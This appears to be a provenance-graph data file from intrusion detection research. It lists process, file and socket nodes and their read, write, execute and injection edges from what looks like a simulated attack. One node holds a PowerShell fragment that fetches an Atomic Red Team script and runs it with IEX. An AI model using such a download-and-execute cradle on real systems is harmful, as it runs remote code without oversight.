12
MP*-p2602380.exe
MF-\d2xc185.vb
MP*-OUTLOOK.EXE 
MF-Files\AnyDesk\AnyDesk.exe
TP*-auditpol.exe
MF-TEMP\Folder_to_zip.zip
MF-C:\Users\admin\AppData\Local\Temp\msetup\operasetup
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX
MP*-MicrosoftEdgeUpdate.exe
MP-ns967A.tmp 
TF-network.m
MP-ns9423.tmp 
32
0 1 RD
0 2 FR
2 1 WR
0 3 RD
2 3 EX
0 4 IJ
4 1 WR
2 4 IJ
4 3 EX
0 5 RD
2 5 RD
4 5 RD
0 6 RD
2 6 EX
4 6 UK
0 7 ST
7 2 RF
0 8 FR
8 1 WR
8 3 EX
8 5 WR
8 7 ST
0 9 FR
9 1 RD
2 9 UK
0 10 EX
8 10 WR
11 1 WR
11 3 WR
11 5 EX
7 11 RF
8 11 UK

